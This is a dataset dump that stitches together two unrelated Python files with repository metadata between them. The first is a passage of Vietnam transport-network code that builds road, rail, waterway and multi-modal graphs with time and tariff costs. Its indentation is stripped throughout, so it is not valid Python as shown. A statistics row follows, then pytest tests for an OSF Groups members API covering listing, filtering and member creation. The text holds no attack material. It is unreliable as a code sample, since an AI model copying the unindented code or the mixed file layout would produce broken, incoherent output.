max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.vehicle_min <= x.vehicle_co < cost_param.vehicle_max:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
return min_tariff_cost, max_tariff_cost
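# Hedged example (the band values are assumptions, not the real costs sheet):
# if the sheet held a row with vehicle_min=1000, vehicle_max=3000,
# tariff_min_usd=0.02 and tariff_max_usd=0.05, an edge with vehicle_co=1500
# and length=10 km would get (min, max) tariff costs of (0.2, 0.5) USD/ton.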
def national_road_shapefile_to_dataframe(edges_in, road_properties_file,usage_factors):
"""Create national network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges: Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level','surface','road_class',
'road_cond','asset_type','width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='latin1')
edges.columns = map(str.lower, edges.columns)
edges['asset_type'] = ''
edges['level'] = ''
# assign asset terrain
edges['terrain'] = edges.apply(assign_national_road_terrain, axis=1)
# assign road condition
edges['road_cond'] = edges.apply(assign_national_road_conditions, axis=1)
# assign road class
edges['road_class'] = edges.apply(assign_national_road_class, axis=1)
# get the right line length
edges['length'] = edges.geometry.apply(line_length)
# correct the widths of the road assets
# get the width of edges
flat_width_range_list = list(pd.read_excel(
road_properties_file, sheet_name='flat_terrain_designs').itertuples(index=False))
mountain_width_range_list = list(pd.read_excel(
road_properties_file, sheet_name='mountain_terrain_designs').itertuples(index=False))
edges['width'] = edges.apply(lambda x: assign_assumed_width_to_national_roads_from_file(
x, flat_width_range_list, mountain_width_range_list), axis=1)
# assign minimum and maximum speed to network
edges['speed'] = edges.apply(lambda x: assign_min_max_speeds_to_national_roads_from_file(
x, flat_width_range_list, mountain_width_range_list), axis=1)
edges[['min_speed', 'max_speed']] = edges['speed'].apply(pd.Series)
edges.drop('speed', axis=1, inplace=True)
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(road_properties_file, sheet_name='costs')
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_national_roads_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of tariff = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_national_roads_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges.rename(columns={'ten_duong_':'number','ten_doan__':'name','loai_mat__':'surface'},inplace = True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def national_road_shapefile_to_network(edges_in, road_properties_file,usage_factors):
"""Create national igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = national_road_shapefile_to_dataframe(edges_in, road_properties_file,usage_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
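# Hedged usage sketch (hypothetical paths; (0.1, 0.1) marks both cost bounds
# up by 10 percent via the usage factors):
def _example_national_network():
    """Build the national road igraph network."""
    return national_road_shapefile_to_network(
        'data/Roads/national_roads_edges.shp',  # hypothetical Shapefile path
        'data/Roads/road_properties.xlsx',      # hypothetical Excel path
        (0.1, 0.1),
    )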
def assign_minmax_time_costs_networks_apply(x, cost_dataframe):
"""Assign time costs on networks in Vietnam
Parameters
- x - Pandas dataframe with values
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_networks_apply(x, cost_dataframe):
"""Assign tariff costs on networks in Vietnam
Parameters
- x - Pandas dataframe with values
- length - Float length of edge in km
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
return min_tariff_cost, max_tariff_cost
def network_shapefile_to_dataframe(edges_in, mode_properties_file, mode_name, speed_min, speed_max,usage_factors):
"""Create network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- speed_min - Float value of minimum assigned speed
- speed_max - Float value of maximum assigned speed
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level',
'width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
edges['number'] = ''
edges['terrain'] = ''
edges['level'] = ''
edges['width'] = 0
edges['vehicle_co'] = 0
if mode_name == 'rail':
edges.rename(columns={'railwaylin':'name'},inplace = True)
elif mode_name in ['inland','coastal']:
edges.rename(columns={'link':'name'},inplace = True)
else:
edges['name'] = ''
# assign asset terrain
# get the right line length
edges['length'] = edges.geometry.apply(line_length)
# assign some speeds
edges['min_speed'] = speed_min
edges['max_speed'] = speed_max
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(mode_properties_file, sheet_name=mode_name)
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_networks_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of tariff = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_networks_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def network_shapefile_to_network(edges_in, mode_properties_file, mode_name, speed_min, speed_max,utilization_factors):
"""Create igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- speed_min - Float value of minimum assigned speed
- speed_max - Float value of maximum assigned speed
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = network_shapefile_to_dataframe(
edges_in, mode_properties_file, mode_name, speed_min, speed_max,utilization_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
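# Hedged usage sketch (all arguments are illustrative assumptions; 'rail'
# must match a sheet in the mode properties file, and the Shapefile is
# expected to carry a 'railwaylin' name column):
def _example_rail_network():
    """Build the rail igraph network with assumed 30-60 km/hr speeds."""
    return network_shapefile_to_network(
        'data/Rail/rail_edges.shp',    # hypothetical Shapefile path
        'data/mode_properties.xlsx',   # hypothetical Excel path
        'rail', 30, 60, (0.0, 0.0),
    )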
def assign_minmax_tariff_costs_multi_modal_apply(x, cost_dataframe):
"""Assign tariff costs on multi-modal network links in Vietnam
Parameters
- x - Pandas dataframe with values
- port_type - String name of port type
- from_mode - String name of mode
- to_mode - String name of mode
- other_mode - String name of mode
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
min_tariff_cost = 0
max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.one_mode == x.port_type and cost_param.other_mode == x.to_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.to_mode and cost_param.other_mode == x.from_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.to_mode and cost_param.other_mode == x.port_type:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
elif cost_param.one_mode == x.from_mode and cost_param.other_mode == x.to_mode:
min_tariff_cost = cost_param.tariff_min_usd
max_tariff_cost = cost_param.tariff_max_usd
break
return min_tariff_cost, max_tariff_cost
def multi_modal_shapefile_to_dataframe(edges_in, mode_properties_file, mode_name, length_threshold,usage_factors):
"""Create multi-modal network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- length_threshold - Float value of threshold in km of length of multi-modal links
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
# assign asset terrain
# get the right line length
edges['length'] = edges.geometry.apply(line_length)
cost_values_df = pd.read_excel(mode_properties_file, sheet_name=mode_name)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of tariff = (unit cost of tariff in USD/ton)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_multi_modal_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time'] = 0
edges['max_time'] = 0
edges['min_time_cost'] = 0
edges['max_time_cost'] = 0
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
edges = edges[edges['length'] < length_threshold]
return edges
def multi_modal_shapefile_to_network(edges_in, mode_properties_file, mode_name, length_threshold,utilization_factors):
"""Create multi-modal igraph network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- mode_properties_file - String path to Excel file with mode attributes
- mode_name - String name of mode
- length_threshold - Float value of threshold in km of length of multi-modal links
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = multi_modal_shapefile_to_dataframe(
edges_in, mode_properties_file, mode_name, length_threshold,utilization_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
# only keep connected network
return G
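# Hedged usage sketch (illustrative arguments; 'multi' stands in for whatever
# sheet name the mode properties file actually uses, and links of 3 km or
# longer are dropped by the threshold):
def _example_multi_modal_network():
    """Build the multi-modal igraph network of short transfer links."""
    return multi_modal_shapefile_to_network(
        'data/multi_modal_edges.shp',  # hypothetical Shapefile path
        'data/mode_properties.xlsx',   # hypothetical Excel path
        'multi', 3.0, (0.0, 0.0),
    )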
def create_port_names(x,port_names_df):
"""Add port names in Vietnamese to port data
Parameters
- x - Pandas DataFrame with values
- port_type - String type of port
- cangbenid - Integer ID of inland port
- objectid - Integer ID of sea port
- port_names_df - Pandas DataFrame with port names
Returns
name - Vietnamese name of port
"""
name = ''
for iter_,port_names in port_names_df.iterrows():
if (x.port_type == 'inland') and (port_names.port_type == 'inland') and (x.cangbenid == port_names.cangbenid):
name = port_names.ten
elif (x.port_type == 'sea') and (port_names.port_type == 'sea') and (x.objectid == port_names.objectid):
name = port_names.ten_cang
return name
def read_waterway_ports(ports_file_with_ids, ports_file_with_names):
"""Create port data with attributes
Parameters
- ports_file_with_ids - String path of GeoDataFrame with port IDs
- ports_file_with_names - String path of GeoDataFrame with port names
Returns
ports_with_id - GeoPandas DataFrame with port attributes
"""
# load data
ports_with_name = gpd.read_file(ports_file_with_names, encoding='utf-8')
ports_with_id = gpd.read_file(ports_file_with_ids, encoding='utf-8')
ports_with_id.columns = map(str.lower, ports_with_id.columns)
ports_with_name.columns = map(str.lower, ports_with_name.columns)
ports_with_id['name'] = ports_with_id.apply(lambda x: create_port_names(x,ports_with_name),axis = 1)
ports_with_id['population'] = 0
ports_with_id['capacity'] = 1e9
ports_with_id = ports_with_id[['node_id','name','port_type','port_class','tons','population','capacity','geometry']]
return ports_with_id
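# Hedged usage sketch (hypothetical paths): merge the port IDs layer with the
# Vietnamese names layer and return the trimmed GeoDataFrame.
def _example_waterway_ports():
    return read_waterway_ports(
        'data/Waterways/ports_with_ids.shp',    # hypothetical Shapefile path
        'data/Waterways/ports_with_names.shp',  # hypothetical Shapefile path
    )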
def read_setor_nodes(node_file_with_ids,sector):
"""Create port data with attributes
Parameters
- ports_file_with_ids - String path of GeoDataFrame with port IDs
- sector - String path of sector
Returns
ports_with_id - GeoPandas DataFrame with port attributes
"""
# load data
add_columns = [('name',''),('tons',0),('population',0),('capacity',1e9)]
ports_with_id = gpd.read_file(node_file_with_ids, encoding='utf-8')
ports_with_id.columns = map(str.lower, ports_with_id.columns)
if sector == 'air':
ports_with_id.rename(columns={'ten': 'name'}, inplace=True)
for ac in add_columns:
if ac[0] not in ports_with_id.columns.values.tolist():
ports_with_id[ac[0]] = ac[1]
ports_with_id = ports_with_id[['node_id','name','tons','population','capacity','geometry']]
return ports_with_id
| 37.421292 | 127 | 0.670598 | 5,827 | 41,126 | 4.499571 | 0.060923 | 0.033563 | 0.016858 | 0.006865 | 0.820283 | 0.793318 | 0.778062 | 0.766887 | 0.734582 | 0.70201 | 0 | 0.012833 | 0.245879 | 41,126 | 1,098 | 128 | 37.455373 | 0.832559 | 0.388975 | 0 | 0.599174 | 0 | 0 | 0.099302 | 0.001009 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059917 | false | 0 | 0.016529 | 0 | 0.208678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4a55659a3eb7beae33c6cf6c8edeb6517a35c90 | 30,485 | py | Python | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | ["Apache-2.0"] | 628 | 2015-01-15T04:33:22.000Z | 2022-03-30T06:40:10.000Z | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | ["Apache-2.0"] | 4,712 | 2015-01-02T01:41:53.000Z | 2022-03-30T14:18:40.000Z | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | ["Apache-2.0"] | 371 | 2015-01-12T16:14:08.000Z | 2022-03-31T18:58:29.000Z | import pytest
from waffle.testutils import override_flag
from django.utils import timezone
from framework.auth.core import Auth
from api.base.settings.defaults import API_BASE
from osf.models import OSFUser
from osf.utils.permissions import MEMBER, MANAGE, MANAGER
from osf_tests.factories import (
AuthUserFactory,
OSFGroupFactory,
)
from osf.features import OSF_GROUPS
@pytest.fixture()
def user():
return AuthUserFactory()
@pytest.fixture()
def manager():
return AuthUserFactory()
@pytest.fixture()
def member():
return AuthUserFactory()
@pytest.fixture()
def old_name():
return 'Platform Team'
@pytest.fixture()
def user3(osf_group):
return AuthUserFactory()
@pytest.fixture()
def osf_group(manager, member, old_name):
group = OSFGroupFactory(name=old_name, creator=manager)
group.make_member(member)
return group
@pytest.fixture()
def url(osf_group):
return '/{}groups/{}/members/'.format(API_BASE, osf_group._id)
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestGroupMembersList:
def test_return_perms(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test unauthenticated
res = app.get(url)
assert res.status_code == 200
# test user
res = app.get(url, auth=user.auth)
assert res.status_code == 200
# test member
res = app.get(url, auth=member.auth)
assert res.status_code == 200
# test manager
res = app.get(url, auth=manager.auth)
assert res.status_code == 200
# test invalid group
url = '/{}groups/{}/members/'.format(API_BASE, '12345_bad_id')
res = app.get(url, auth=manager.auth, expect_errors=True)
assert res.status_code == 404
def test_return_members(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
res = app.get(url)
data = res.json['data']
assert len(data) == 2
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersFilter:
def test_filtering(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test filter members
url_filter = url + '?filter[role]=member'
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
# test filter managers
url_filter = url + '?filter[role]=manager'
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
# test invalid role
url_filter = url + '?filter[role]=bad_role'
res = app.get(url_filter, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == "Value \'bad_role\' is not valid."
# test filter fullname
url_filter = url + '?filter[full_name]={}'.format(manager.fullname)
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
# test filter fullname
url_filter = url + '?filter[full_name]={}'.format(member.fullname)
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
# test invalid filter
url_filter = url + '?filter[created]=2018-02-01'
res = app.get(url_filter, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == "\'created\' is not a valid field for this endpoint."
def make_create_payload(role, user=None, full_name=None, email=None):
base_payload = {
'data': {
'type': 'group-members',
'attributes': {
'role': role
}
}
}
if user:
base_payload['data']['relationships'] = {
'users': {
'data': {
'id': user._id,
'type': 'users'
}
}
}
else:
if full_name:
base_payload['data']['attributes']['full_name'] = full_name
if email:
base_payload['data']['attributes']['email'] = email
return base_payload
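# Hedged example (illustrative): for an unregistered member,
#   make_create_payload('member', full_name='Crazy 8s', email='eight@cos.io')
# builds
#   {'data': {'type': 'group-members',
#             'attributes': {'role': 'member', 'full_name': 'Crazy 8s',
#                            'email': 'eight@cos.io'}}}
# with no 'relationships' key, since no registered user was supplied.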
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersCreate:
def test_create_manager(self, app, manager, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MANAGER, user3)
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MANAGER
assert data['attributes']['full_name'] == user3.fullname
assert data['attributes']['unregistered_member'] is None
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert user3._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user3, MANAGE) is True
def test_create_member(self, app, member, manager, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MEMBER, user3)
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MEMBER
assert data['attributes']['full_name'] == user3.fullname
assert data['attributes']['unregistered_member'] is None
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert user3._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user3, MANAGE) is False
assert osf_group.has_permission(user3, MEMBER) is True
def test_add_unregistered_member(self, app, manager, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
full_name = 'Crazy 8s'
payload = make_create_payload(MEMBER, user=None, full_name=full_name, email='eight@cos.io')
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MEMBER
user = OSFUser.load(data['id'].split('-')[1])
assert user._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user, MANAGE) is False
assert data['attributes']['full_name'] == full_name
assert data['attributes']['unregistered_member'] == full_name
assert osf_group.has_permission(user, MEMBER) is True
assert user in osf_group.members_only
assert user not in osf_group.managers
# test unregistered user is already a member
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User already exists.'
# test unregistered user email is blocked
payload['data']['attributes']['email'] = 'eight@example.com'
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Email address domain is blocked.'
def test_create_member_perms(self, app, manager, member, osf_group, user3, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MEMBER, user3)
# Unauthenticated
res = app.post_json_api(url, payload, expect_errors=True)
assert res.status_code == 401
# Logged in, nonmember
res = app.post_json_api(url, payload, auth=user3.auth, expect_errors=True)
assert res.status_code == 403
# Logged in, nonmanager
res = app.post_json_api(url, payload, auth=member.auth, expect_errors=True)
assert res.status_code == 403
def test_create_members_errors(self, app, manager, member, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# invalid user
bad_user_payload = make_create_payload(MEMBER, user=user3)
bad_user_payload['data']['relationships']['users']['data']['id'] = 'bad_user_id'
res = app.post_json_api(url, bad_user_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == 'User with id bad_user_id not found.'
# invalid type
bad_type_payload = make_create_payload(MEMBER, user=user3)
bad_type_payload['data']['type'] = 'bad_type'
res = app.post_json_api(url, bad_type_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 409
# invalid role
bad_perm_payload = make_create_payload('bad_role', user=user3)
res = app.post_json_api(url, bad_perm_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_role is not a valid role; choose manager or member.'
# fullname not included
unregistered_payload = make_create_payload(MEMBER, user=None, full_name=None, email='eight@cos.io')
res = app.post_json_api(url, unregistered_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
# email not included
unregistered_payload = make_create_payload(MEMBER, user=None, full_name='Crazy 8s', email=None)
res = app.post_json_api(url, unregistered_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
# user is already a member
existing_member_payload = make_create_payload(MEMBER, user=member)
res = app.post_json_api(url, existing_member_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User is already a member of this group.'
# Disabled user
user3.date_disabled = timezone.now()
user3.save()
payload = make_create_payload(MEMBER, user=user3)
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Deactivated users cannot be added to OSF Groups.'
# No role specified - given member by default
user3.date_disabled = None
user3.save()
payload = make_create_payload(MEMBER, user=user3)
            payload['data']['attributes'] = {}  # drop the role so the API default (member) applies
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
assert res.json['data']['attributes']['role'] == MEMBER
assert osf_group.has_permission(user3, 'member')
assert not osf_group.has_permission(user3, 'manager')
def make_bulk_create_payload(role, user=None, full_name=None, email=None):
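    """Build a single resource object for a bulk group-members request.

    Same shape as ``make_create_payload`` but without the top-level ``data``
    wrapper, since bulk requests send a list of resource objects.
    """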
base_payload = {
'type': 'group-members',
'attributes': {
'role': role
}
}
if user:
base_payload['relationships'] = {
'users': {
'data': {
'id': user._id,
'type': 'users'
}
}
}
else:
if full_name:
base_payload['attributes']['full_name'] = full_name
if email:
base_payload['attributes']['email'] = email
return base_payload
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkCreate:
def test_bulk_create_group_member_perms(self, app, url, manager, member, user, user3, osf_group):
with override_flag(OSF_GROUPS, active=True):
payload_user_three = make_bulk_create_payload(MANAGER, user3)
payload_user = make_bulk_create_payload(MEMBER, user)
bulk_payload = [payload_user_three, payload_user]
# unauthenticated
res = app.post_json_api(url, {'data': bulk_payload}, expect_errors=True, bulk=True)
assert res.status_code == 401
# non member
res = app.post_json_api(url, {'data': bulk_payload}, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# member
res = app.post_json_api(url, {'data': bulk_payload}, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# manager
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, bulk=True)
assert res.status_code == 201
assert len(res.json['data']) == 2
assert osf_group.is_member(user) is True
assert osf_group.is_member(user3) is True
assert osf_group.is_manager(user) is False
assert osf_group.is_manager(user3) is True
def test_bulk_create_unregistered(self, app, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload_user = make_bulk_create_payload(MEMBER, user)
payload_unregistered = make_bulk_create_payload(MEMBER, user=None, full_name='Crazy 8s', email='eight@cos.io')
res = app.post_json_api(url, {'data': [payload_user, payload_unregistered]}, auth=manager.auth, bulk=True)
unreg_user = OSFUser.objects.get(username='eight@cos.io')
assert res.status_code == 201
ids = [user_data['id'] for user_data in res.json['data']]
roles = [user_data['attributes']['role'] for user_data in res.json['data']]
assert '{}-{}'.format(osf_group._id, user._id) in ids
assert '{}-{}'.format(osf_group._id, unreg_user._id) in ids
assert roles[0] == MEMBER
assert roles[1] == MEMBER
unregistered_names = [user_data['attributes']['unregistered_member'] for user_data in res.json['data']]
assert set(['Crazy 8s', None]) == set(unregistered_names)
assert osf_group.has_permission(user, MANAGE) is False
assert osf_group.has_permission(user, MEMBER) is True
assert osf_group.has_permission(unreg_user, MANAGE) is False
assert osf_group.has_permission(unreg_user, MEMBER) is True
assert osf_group.is_member(unreg_user) is True
assert osf_group.is_manager(unreg_user) is False
def test_bulk_create_group_member_errors(self, app, url, manager, member, user, user3, osf_group):
with override_flag(OSF_GROUPS, active=True):
payload_member = make_bulk_create_payload(MANAGER, member)
payload_user = make_bulk_create_payload(MANAGER, user)
# User in bulk payload is an invalid user
bad_user_payload = make_bulk_create_payload(MEMBER, user=user3)
bad_user_payload['relationships']['users']['data']['id'] = 'bad_user_id'
bulk_payload = [payload_user, bad_user_payload]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == 'User with id bad_user_id not found.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
            # Type in bulk payload is invalid
bad_type_payload = make_bulk_create_payload(MEMBER, user=user3)
bad_type_payload['type'] = 'bad_type'
bulk_payload = [payload_user, bad_type_payload]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 409
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
